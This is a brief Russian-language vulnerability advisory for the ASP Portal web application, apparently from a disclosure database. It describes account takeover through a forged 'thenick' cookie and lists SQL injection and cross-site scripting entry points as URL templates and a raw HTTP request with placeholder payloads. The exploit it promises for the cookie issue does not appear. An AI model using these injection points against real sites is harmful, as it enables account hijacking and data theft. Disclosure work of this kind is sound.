Программа: ASP Portal
Несколько уязвимостей обнаружено в ASP Portal. Удаленный пользователь может внедрить SQL команды и может внедриться в учетную запись пользователя. Удаленный пользователь может выполнить XSS нападение.
1. Удаленный пользователь может изменить значение 'thenick' куки, чтобы получить доступ к учетной записи целевого пользователя, включая учетную запись администратора. Эскплоит ниже.
2. SQL инъекция:
http://[target]/index.asp?inc=blog&pageid='[SqlQ uery]
http://[target]/index.asp?inc=downloadssub&downloadscat='[SqlQuery]
GET http://localhost/index.asp HTTP/1.1
Cookie: thenick='[SqlQuery]
3. XSS
http://[target]/index.asp?inc=' >[XSS]
http://[target]/index.asp?inc=profile&searchtext='>[XSS]
http://[target]/index.asp?inc=forumread&article='>[XSS]
